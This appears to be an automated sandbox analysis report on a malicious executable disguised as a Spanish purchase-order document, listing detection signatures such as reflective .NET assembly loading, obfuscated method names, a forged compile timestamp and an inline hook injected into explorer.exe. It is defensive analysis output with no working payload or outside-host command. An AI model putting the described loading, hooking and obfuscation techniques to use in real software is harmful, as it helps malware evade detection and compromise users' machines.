Source: 2.2.Solicitud de pedido Documento No 168646080.exe.7070000.8.raw.unpack, -Module-.cs	.Net Code: _206D_202D_206D_202D_206F_202C_200E_206B_202D_206C_206A_206A_202E_202D_202E_202E_206D_206A_200E_200B_206C_206B_202C_202A_202E_206C_206B_200E_200E_206F_202E_200E_200F_200D_202A_206C_202B_202C_206A_200D_202E System.Reflection.Assembly.Load(byte[])
Source: 2.2.Solicitud de pedido Documento No 168646080.exe.7070000.8.raw.unpack, Architectural.cs	.Net Code: Justy
Source: 2.2.Solicitud de pedido Documento No 168646080.exe.7070000.8.raw.unpack, Architectural.cs	.Net Code: _206A_202E_202C_202C_206F_206C_206A_200D_202B_202B_206C_200F_206A_200E_200E_202E_202E_200B_206D_206E_206D_200E_206F_202D_200C_206B_200D_206C_200B_206C_202B_202E_206F_200B_206B_200C_202B_200D_200D_206C_202E System.Reflection.Assembly.Load(byte[])
Source: 2.2.Solicitud de pedido Documento No 168646080.exe.4346620.7.raw.unpack, kbyZoOFYGol61nA9yq.cs	.Net Code: vnLm7js8uM System.Reflection.Assembly.Load(byte[])
Source: 2.2.Solicitud de pedido Documento No 168646080.exe.371a190.6.raw.unpack, -Module-.cs	.Net Code: _206D_202D_206D_202D_206F_202C_200E_206B_202D_206C_206A_206A_202E_202D_202E_202E_206D_206A_200E_200B_206C_206B_202C_202A_202E_206C_206B_200E_200E_206F_202E_200E_200F_200D_202A_206C_202B_202C_206A_200D_202E System.Reflection.Assembly.Load(byte[])
Source: 2.2.Solicitud de pedido Documento No 168646080.exe.371a190.6.raw.unpack, Architectural.cs	.Net Code: Justy
Source: 2.2.Solicitud de pedido Documento No 168646080.exe.371a190.6.raw.unpack, Architectural.cs	.Net Code: _206A_202E_202C_202C_206F_206C_206A_200D_202B_202B_206C_200F_206A_200E_200E_202E_202E_200B_206D_206E_206D_200E_206F_202D_200C_206B_200D_206C_200B_206C_202B_202E_206F_200B_206B_200C_202B_200D_200D_206C_202E System.Reflection.Assembly.Load(byte[])
Source: 7.2.explorer.exe.1043f840.0.raw.unpack, EmployeeDash.cs	.Net Code: InitializeComponent System.AppDomain.Load(byte[])
Source: 7.2.explorer.exe.1043f840.0.raw.unpack, EmployeeDash.cs	.Net Code: InitializeComponent contains xor as well as GetObject
Source: 8.2.msiexec.exe.521f840.3.raw.unpack, EmployeeDash.cs	.Net Code: InitializeComponent System.AppDomain.Load(byte[])
Source: 8.2.msiexec.exe.521f840.3.raw.unpack, EmployeeDash.cs	.Net Code: InitializeComponent contains xor as well as GetObject

Source: Solicitud de pedido Documento No 168646080.exe

Static PE information: 0xE52FAD6A [Mon Nov 5 13:17:30 2091 UTC]

Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_00BFC220 push eax; retf	2_2_00BFC226
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_00BFC873 push edx; retf	2_2_00BFC87E
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_00BFD6EA push eax; iretd	2_2_00BFD6F1
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_00BFBDB8 push eax; retf	2_2_00BFBDC2
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_00BFDEF3 pushad ; retf	2_2_00BFDF02
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_00BFBE40 push edi; retf	2_2_00BFBE52
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_06EA4580 push edi; retf	2_2_06EA458E
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_06FE36D3 push ebx; iretd	2_2_06FE36DA
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_06FFC46D push esi; ret	2_2_06FFC46E
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_06FFC463 push esi; ret	2_2_06FFC464
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_06FFD0EB push es; iretd	2_2_06FFD0EC
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_06FFD117 push es; iretd	2_2_06FFD120
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 2_2_07374FC0 pushad ; retf	2_2_07374FCE
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0041683E push esi; ret	6_2_0041683F
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0041718B push ds; iretd	6_2_0041718C
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0041E99E push esi; iretd	6_2_0041E99F
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_00417224 push ebx; iretd	6_2_0041722A
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0041D4F2 push eax; ret	6_2_0041D4F8
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0041D4FB push eax; ret	6_2_0041D562
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_00417C92 push ss; retf	6_2_00417C9E
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0041D4A5 push eax; ret	6_2_0041D4F8
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0041D55C push eax; ret	6_2_0041D562
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0040F531 push 75DF417Dh; iretd	6_2_0040F536
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0163225F pushad ; ret	6_2_016327F9
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016327FA pushad ; ret	6_2_016327F9
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016609AD push ecx; mov dword ptr [esp], ecx	6_2_016609B6
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0163283D push eax; iretd	6_2_01632858
Source: C:\Windows\explorer.exe	Code function: 7_2_0868D08E push esi; iretd	7_2_0868D08F
Source: C:\Windows\explorer.exe	Code function: 7_2_0868AB02 push esp; retn 0000h	7_2_0868AB03
Source: C:\Windows\explorer.exe	Code function: 7_2_0868AB1E push esp; retn 0000h	7_2_0868AB1F
Source: C:\Windows\explorer.exe	Code function: 7_2_0868A9B5 push esp; retn 0000h	7_2_0868AAE7

Source: Solicitud de pedido Documento No 168646080.exe

Static PE information: section name: .text entropy: 7.820552407910732

Source: 2.2.Solicitud de pedido Documento No 168646080.exe.dfb0000.10.raw.unpack, sLRI9GJjvArwHEhSWK.cs	High entropy of concatenated method names: 'ToString', 'MoSqG05CGK', 'lj6qj8wmTq', 'HN7qAcgVF9', 'Ev2qLrj5AM', 'lwhqH3PPPf', 'bIHqCmk9VK', 'xxVq3gmmXs', 'XJUqnvRf4o', 'l1hqEiVvYn'
Source: 2.2.Solicitud de pedido Documento No 168646080.exe.dfb0000.10.raw.unpack, UEt4RuVj59T2YvPenP.cs	High entropy of concatenated method names: 'tpH5YlWom3', 'EUA5wAyR9B', 'ujS5Vmv707', 'grg5M5oLR8', 'LwJ5jO1aVn', 'tDe5AlE2es', 'tWd5LCIpQB', 'Mn35HPPtTK', 'FbI5ChTZdc', 'Bi1539QCeA'
Source: 2.2.Solicitud de pedido Documento No 168646080.exe.dfb0000.10.raw.unpack, s9W9qXssUxe91dWd8e.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'ChJNXlyjhn', 're2NOpnUd0', 'nS3NzPLw3R', 'wjCh2RkhHF', 'LVqhZwlmw5', 'xBahN6rXfk', 'tGnhhvKD75', 'od8qB8ltYjJ32DIkgGq'
Source: 2.2.Solicitud de pedido Documento No 168646080.exe.dfb0000.10.raw.unpack, uUP5ZuEbq2Gi9XMBD4.cs	High entropy of concatenated method names: 'to68kLJQhK', 'Tcv8f6v12R', 'i9L87gj7Bv', 'fxg8Pov4lH', 'm218p1dSk8', 'YLk8apUbh5', 'Jwf8rV4bHg', 'BnR8tLtF14', 'W9l8D027X9', 'OnT8Kwiu6i'
Source: 2.2.Solicitud de pedido Documento No 168646080.exe.dfb0000.10.raw.unpack, PNfuJEZ2FZppjAAPwOi.cs	High entropy of concatenated method names: 'tE64k7LBV0', 'pYI4ftMQv9', 'f7o47JA1xQ', 'VHD4P3X6DT', 'uaD4pc2WwP', 'hlY4a9FPum', 'IIB4rrnKFf', 'j7h4ttPskR', 'OAL4DOpmGN', 'CVb4KIdvjl'
Source: 2.2.Solicitud de pedido Documento No 168646080.exe.dfb0000.10.raw.unpack, JqZxH7NGZe0CZqVjYM.cs	High entropy of concatenated method names: 'nN67yfDq7', 'v1gP2HnqP', 'hPRaMPnou', 'JPorypiJa', 'TSADf7hYe', 'RTYKDo1OO', 'Wu9T0JTEmFwGAKXtxg', 'YDKRXDuCsyFYMxJ1EU', 'NopRujgvj', 'F66uZq6vN'
Source: 2.2.Solicitud de pedido Documento No 168646080.exe.dfb0000.10.raw.unpack, WEt2tMxBuP0WJAu67W.cs	High entropy of concatenated method names: 'V3JUglg9h6', 'knxUOYcnOt', 'zgZR2gYigX', 'X2VRZS59fH', 'viXUGPUjFw', 'Yu0UwOWpOb', 'grQUv719V8', 'nVmUVp7DFa', 'KKCUMkagqF', 'Ev5UJbrW4f'
Source: 2.2.Solicitud de pedido Documento No 168646080.exe.dfb0000.10.raw.unpack, kbyZoOFYGol61nA9yq.cs	High entropy of concatenated method names: 'rUehoLpnhN', 'rpthQO46F5', 'B4wh1hmalt', 'jXwhskN8NK', 'MPQhW2XnxN', 'QZQhSeb6UR', 'MbAh8JGHLE', 'FBchFbLdEO', 'RNKh9suWi7', 'G21hBY1LlW'
Source: 2.2.Solicitud de pedido Documento No 168646080.exe.dfb0000.10.raw.unpack, mfHaqEmWGMPG8q2JbU.cs	High entropy of concatenated method names: 'ExdZ8hpP5T', 'NouZFWaYsE', 'IlpZBRf1IY', 'WM0ZlXssI8', 'u8wZ58ddv6', 'jhEZqYFL3Z', 'kWDb5TXgR0QtU6gNN2', 'SFw6vH2PM6AfbinNQN', 'YFiZZyX8aF', 'lKOZh29LCF'
Source: 2.2.Solicitud de pedido Documento No 168646080.exe.dfb0000.10.raw.unpack, whpP5TtEouWaYsEmMt.cs	High entropy of concatenated method names: 'pTv1VnfKTr', 'QK61MjMHJb', 'By01J2PEu4', 'cYE1cQFeFQ', 'uy210QLlOG', 'CdF1xcgYpV', 'Xvq1ePrZ6N', 'wMJ1gEE6q5', 'g4o1XckZRO', 'joq1OWdmiu'
Source: 2.2.Solicitud de pedido Documento No 168646080.exe.dfb0000.10.raw.unpack, Vpd9pvc8KTgC1ikJTB.cs	High entropy of concatenated method names: 'e9eUB6XWtm', 'TZEUlsfGAQ', 'ToString', 'YdOUQbo0Qc', 'hXvU1E6KRM', 'vgGUsGlZtM', 'R26UWRQxW0', 'CjNUSIfbgF', 'g6eU8fgvRs', 'b8ZUFAvrWP'
Source: 2.2.Solicitud de pedido Documento No 168646080.exe.dfb0000.10.raw.unpack, nbVmOt39PuGpFLTi56.cs	High entropy of concatenated method names: 'Swa8Qt5BS6', 'JUX8slxfap', 'dcD8SxplxH', 'yt7SOr7ypU', 'OLWSzM0hEF', 'AmR82ZTcIx', 'lYk8ZkvKg5', 'OYy8NYTKPL', 'w7t8hrsQ40', 'jgk8mZF3po'
Source: 2.2.Solicitud de pedido Documento No 168646080.exe.dfb0000.10.raw.unpack, L8GOIBzlkeLmGR2cdg.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Uae46V4QZ1', 'jOk45MqEpi', 'dr34q5Rsy5', 'mi64U25c1t', 'yia4RpMdyU', 'C6W443esno', 'NSP4uSvcO7'
Source: 2.2.Solicitud de pedido Documento No 168646080.exe.dfb0000.10.raw.unpack, VwagPN15K2l8SkE0JM.cs	High entropy of concatenated method names: 'Dispose', 'xLhZXZKcaQ', 'Y53NjlCEVb', 'hcq337CPaS', 'TtqZOZD0vG', 'eDsZzpBUcv', 'ProcessDialogKey', 'SoXN2QA7bA', 'vU6NZbYKxM', 'I7CNNObF1Q'
Source: 2.2.Solicitud de pedido Documento No 168646080.exe.dfb0000.10.raw.unpack, vv68hEbYFL3ZYtq818.cs	High entropy of concatenated method names: 'dNkSoGBsCw', 'WCMS1rfbJi', 'JHsSWRiswn', 'jKFS8JViTa', 'eBqSFxXo6j', 'IfIW0KDfUk', 'L83Wx3xNxP', 't9pWeObIO5', 'WQrWg0bFdw', 's4HWXMYiKN'
Source: 2.2.Solicitud de pedido Documento No 168646080.exe.dfb0000.10.raw.unpack, YbF1QsOtp49H6Dm81q.cs	High entropy of concatenated method names: 'NT34ZgvvZI', 'jD64hDlk39', 'MRD4mw0FsF', 'Y934QDnnnU', 'tZW413jSK5', 'yCc4WKJXM5', 'gFn4SjN9XM', 'QPBReLZoJN', 'kw8RgGoDJt', 'bTsRXVCNTK'
Source: 2.2.Solicitud de pedido Documento No 168646080.exe.dfb0000.10.raw.unpack, hsI8m9KyGvuHpI8w8d.cs	High entropy of concatenated method names: 'NOuWpTkPQ2', 'dLGWroWHCS', 'Qj8sAKBKyC', 'ECRsLodQSx', 'WyesHsxpis', 'F9qsCcgdl5', 'zKLs321vaU', 'HDEsnTaHpg', 'NJAsETqU6r', 'QLIsYP2Qlf'
Source: 2.2.Solicitud de pedido Documento No 168646080.exe.dfb0000.10.raw.unpack, XQA7bAXdU6bYKxMA7C.cs	High entropy of concatenated method names: 'aoaRbsyvad', 'GTURj4INBv', 'WCPRAtcPSH', 'GVVRLOIeW8', 'RfwRVrjr3u', 'e6URHXjvON', 'Next', 'Next', 'Next', 'NextBytes'
Source: 2.2.Solicitud de pedido Documento No 168646080.exe.dfb0000.10.raw.unpack, EqZD0vgGmDspBUcvJo.cs	High entropy of concatenated method names: 'FJBRQNhitS', 'qawR1lrmeV', 'YYxRsWo7D8', 'QKqRWKilpi', 'bCfRSeq9gf', 'MJkR89IMeU', 'EyWRFQSr8j', 'H4OR9L7Urx', 'FupRB7EV8F', 'kBqRlpjjIa'
Source: 2.2.Solicitud de pedido Documento No 168646080.exe.dfb0000.10.raw.unpack, pm3pWcZhFFHY7Yyrfm4.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'lnDuVdeXOo', 'DQnuMITheL', 'HQKuJAqQqo', 'Y3puc6Mvc7', 'RMgu0kyFJw', 'oBjuxq7wm1', 'uhEue1vRoV'
Source: 2.2.Solicitud de pedido Documento No 168646080.exe.dfb0000.10.raw.unpack, nJr2IADlpRf1IYeM0X.cs	High entropy of concatenated method names: 'HgmsPmxewk', 'r5ZsaOOwAv', 'v7UstchblL', 'abWsDt7jM5', 'GW4s5aEtV1', 'rHYsqRrrRL', 'BWksUSEDt2', 'mO4sRT46cf', 'BtBs4SEdSv', 'GuusufkakR'
Source: 2.2.Solicitud de pedido Documento No 168646080.exe.dfb0000.10.raw.unpack, BVsas0vPoB4GWwT1ln.cs	High entropy of concatenated method names: 'Fs66tunHJP', 'FEk6DBqDQd', 'PyT6bqCXDH', 'prb6jmsy8C', 'lgA6LiOU9r', 'Etw6HXxnyV', 'dt563efKfP', 'jJd6neYrOF', 'I9H6YHgftk', 'lXn6G7SVVX'
Source: 2.2.Solicitud de pedido Documento No 168646080.exe.27e322c.2.raw.unpack, fJ.cs	High entropy of concatenated method names: 'Jj1', 'MjV', 'VmD', 'OjP', 'AjI', 'sj9', 'jjb', 'yjh', 'RgtTUJcyZL', 'Vmf'
Source: 2.2.Solicitud de pedido Documento No 168646080.exe.4346620.7.raw.unpack, sLRI9GJjvArwHEhSWK.cs	High entropy of concatenated method names: 'ToString', 'MoSqG05CGK', 'lj6qj8wmTq', 'HN7qAcgVF9', 'Ev2qLrj5AM', 'lwhqH3PPPf', 'bIHqCmk9VK', 'xxVq3gmmXs', 'XJUqnvRf4o', 'l1hqEiVvYn'
Source: 2.2.Solicitud de pedido Documento No 168646080.exe.4346620.7.raw.unpack, UEt4RuVj59T2YvPenP.cs	High entropy of concatenated method names: 'tpH5YlWom3', 'EUA5wAyR9B', 'ujS5Vmv707', 'grg5M5oLR8', 'LwJ5jO1aVn', 'tDe5AlE2es', 'tWd5LCIpQB', 'Mn35HPPtTK', 'FbI5ChTZdc', 'Bi1539QCeA'
Source: 2.2.Solicitud de pedido Documento No 168646080.exe.4346620.7.raw.unpack, s9W9qXssUxe91dWd8e.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'ChJNXlyjhn', 're2NOpnUd0', 'nS3NzPLw3R', 'wjCh2RkhHF', 'LVqhZwlmw5', 'xBahN6rXfk', 'tGnhhvKD75', 'od8qB8ltYjJ32DIkgGq'
Source: 2.2.Solicitud de pedido Documento No 168646080.exe.4346620.7.raw.unpack, uUP5ZuEbq2Gi9XMBD4.cs	High entropy of concatenated method names: 'to68kLJQhK', 'Tcv8f6v12R', 'i9L87gj7Bv', 'fxg8Pov4lH', 'm218p1dSk8', 'YLk8apUbh5', 'Jwf8rV4bHg', 'BnR8tLtF14', 'W9l8D027X9', 'OnT8Kwiu6i'
Source: 2.2.Solicitud de pedido Documento No 168646080.exe.4346620.7.raw.unpack, PNfuJEZ2FZppjAAPwOi.cs	High entropy of concatenated method names: 'tE64k7LBV0', 'pYI4ftMQv9', 'f7o47JA1xQ', 'VHD4P3X6DT', 'uaD4pc2WwP', 'hlY4a9FPum', 'IIB4rrnKFf', 'j7h4ttPskR', 'OAL4DOpmGN', 'CVb4KIdvjl'
Source: 2.2.Solicitud de pedido Documento No 168646080.exe.4346620.7.raw.unpack, JqZxH7NGZe0CZqVjYM.cs	High entropy of concatenated method names: 'nN67yfDq7', 'v1gP2HnqP', 'hPRaMPnou', 'JPorypiJa', 'TSADf7hYe', 'RTYKDo1OO', 'Wu9T0JTEmFwGAKXtxg', 'YDKRXDuCsyFYMxJ1EU', 'NopRujgvj', 'F66uZq6vN'
Source: 2.2.Solicitud de pedido Documento No 168646080.exe.4346620.7.raw.unpack, WEt2tMxBuP0WJAu67W.cs	High entropy of concatenated method names: 'V3JUglg9h6', 'knxUOYcnOt', 'zgZR2gYigX', 'X2VRZS59fH', 'viXUGPUjFw', 'Yu0UwOWpOb', 'grQUv719V8', 'nVmUVp7DFa', 'KKCUMkagqF', 'Ev5UJbrW4f'
Source: 2.2.Solicitud de pedido Documento No 168646080.exe.4346620.7.raw.unpack, kbyZoOFYGol61nA9yq.cs	High entropy of concatenated method names: 'rUehoLpnhN', 'rpthQO46F5', 'B4wh1hmalt', 'jXwhskN8NK', 'MPQhW2XnxN', 'QZQhSeb6UR', 'MbAh8JGHLE', 'FBchFbLdEO', 'RNKh9suWi7', 'G21hBY1LlW'
Source: 2.2.Solicitud de pedido Documento No 168646080.exe.4346620.7.raw.unpack, mfHaqEmWGMPG8q2JbU.cs	High entropy of concatenated method names: 'ExdZ8hpP5T', 'NouZFWaYsE', 'IlpZBRf1IY', 'WM0ZlXssI8', 'u8wZ58ddv6', 'jhEZqYFL3Z', 'kWDb5TXgR0QtU6gNN2', 'SFw6vH2PM6AfbinNQN', 'YFiZZyX8aF', 'lKOZh29LCF'
Source: 2.2.Solicitud de pedido Documento No 168646080.exe.4346620.7.raw.unpack, whpP5TtEouWaYsEmMt.cs	High entropy of concatenated method names: 'pTv1VnfKTr', 'QK61MjMHJb', 'By01J2PEu4', 'cYE1cQFeFQ', 'uy210QLlOG', 'CdF1xcgYpV', 'Xvq1ePrZ6N', 'wMJ1gEE6q5', 'g4o1XckZRO', 'joq1OWdmiu'
Source: 2.2.Solicitud de pedido Documento No 168646080.exe.4346620.7.raw.unpack, Vpd9pvc8KTgC1ikJTB.cs	High entropy of concatenated method names: 'e9eUB6XWtm', 'TZEUlsfGAQ', 'ToString', 'YdOUQbo0Qc', 'hXvU1E6KRM', 'vgGUsGlZtM', 'R26UWRQxW0', 'CjNUSIfbgF', 'g6eU8fgvRs', 'b8ZUFAvrWP'
Source: 2.2.Solicitud de pedido Documento No 168646080.exe.4346620.7.raw.unpack, nbVmOt39PuGpFLTi56.cs	High entropy of concatenated method names: 'Swa8Qt5BS6', 'JUX8slxfap', 'dcD8SxplxH', 'yt7SOr7ypU', 'OLWSzM0hEF', 'AmR82ZTcIx', 'lYk8ZkvKg5', 'OYy8NYTKPL', 'w7t8hrsQ40', 'jgk8mZF3po'
Source: 2.2.Solicitud de pedido Documento No 168646080.exe.4346620.7.raw.unpack, L8GOIBzlkeLmGR2cdg.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Uae46V4QZ1', 'jOk45MqEpi', 'dr34q5Rsy5', 'mi64U25c1t', 'yia4RpMdyU', 'C6W443esno', 'NSP4uSvcO7'
Source: 2.2.Solicitud de pedido Documento No 168646080.exe.4346620.7.raw.unpack, VwagPN15K2l8SkE0JM.cs	High entropy of concatenated method names: 'Dispose', 'xLhZXZKcaQ', 'Y53NjlCEVb', 'hcq337CPaS', 'TtqZOZD0vG', 'eDsZzpBUcv', 'ProcessDialogKey', 'SoXN2QA7bA', 'vU6NZbYKxM', 'I7CNNObF1Q'
Source: 2.2.Solicitud de pedido Documento No 168646080.exe.4346620.7.raw.unpack, vv68hEbYFL3ZYtq818.cs	High entropy of concatenated method names: 'dNkSoGBsCw', 'WCMS1rfbJi', 'JHsSWRiswn', 'jKFS8JViTa', 'eBqSFxXo6j', 'IfIW0KDfUk', 'L83Wx3xNxP', 't9pWeObIO5', 'WQrWg0bFdw', 's4HWXMYiKN'
Source: 2.2.Solicitud de pedido Documento No 168646080.exe.4346620.7.raw.unpack, YbF1QsOtp49H6Dm81q.cs	High entropy of concatenated method names: 'NT34ZgvvZI', 'jD64hDlk39', 'MRD4mw0FsF', 'Y934QDnnnU', 'tZW413jSK5', 'yCc4WKJXM5', 'gFn4SjN9XM', 'QPBReLZoJN', 'kw8RgGoDJt', 'bTsRXVCNTK'
Source: 2.2.Solicitud de pedido Documento No 168646080.exe.4346620.7.raw.unpack, hsI8m9KyGvuHpI8w8d.cs	High entropy of concatenated method names: 'NOuWpTkPQ2', 'dLGWroWHCS', 'Qj8sAKBKyC', 'ECRsLodQSx', 'WyesHsxpis', 'F9qsCcgdl5', 'zKLs321vaU', 'HDEsnTaHpg', 'NJAsETqU6r', 'QLIsYP2Qlf'
Source: 2.2.Solicitud de pedido Documento No 168646080.exe.4346620.7.raw.unpack, XQA7bAXdU6bYKxMA7C.cs	High entropy of concatenated method names: 'aoaRbsyvad', 'GTURj4INBv', 'WCPRAtcPSH', 'GVVRLOIeW8', 'RfwRVrjr3u', 'e6URHXjvON', 'Next', 'Next', 'Next', 'NextBytes'
Source: 2.2.Solicitud de pedido Documento No 168646080.exe.4346620.7.raw.unpack, EqZD0vgGmDspBUcvJo.cs	High entropy of concatenated method names: 'FJBRQNhitS', 'qawR1lrmeV', 'YYxRsWo7D8', 'QKqRWKilpi', 'bCfRSeq9gf', 'MJkR89IMeU', 'EyWRFQSr8j', 'H4OR9L7Urx', 'FupRB7EV8F', 'kBqRlpjjIa'
Source: 2.2.Solicitud de pedido Documento No 168646080.exe.4346620.7.raw.unpack, pm3pWcZhFFHY7Yyrfm4.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'lnDuVdeXOo', 'DQnuMITheL', 'HQKuJAqQqo', 'Y3puc6Mvc7', 'RMgu0kyFJw', 'oBjuxq7wm1', 'uhEue1vRoV'
Source: 2.2.Solicitud de pedido Documento No 168646080.exe.4346620.7.raw.unpack, nJr2IADlpRf1IYeM0X.cs	High entropy of concatenated method names: 'HgmsPmxewk', 'r5ZsaOOwAv', 'v7UstchblL', 'abWsDt7jM5', 'GW4s5aEtV1', 'rHYsqRrrRL', 'BWksUSEDt2', 'mO4sRT46cf', 'BtBs4SEdSv', 'GuusufkakR'
Source: 2.2.Solicitud de pedido Documento No 168646080.exe.4346620.7.raw.unpack, BVsas0vPoB4GWwT1ln.cs	High entropy of concatenated method names: 'Fs66tunHJP', 'FEk6DBqDQd', 'PyT6bqCXDH', 'prb6jmsy8C', 'lgA6LiOU9r', 'Etw6HXxnyV', 'dt563efKfP', 'jJd6neYrOF', 'I9H6YHgftk', 'lXn6G7SVVX'

Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	File created: \solicitud de pedido documento no 168646080.exe
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	File created: \solicitud de pedido documento no 168646080.exe
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	File created: \solicitud de pedido documento no 168646080.exe	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	File created: \solicitud de pedido documento no 168646080.exe	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x81 0x1E 0xE0

Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
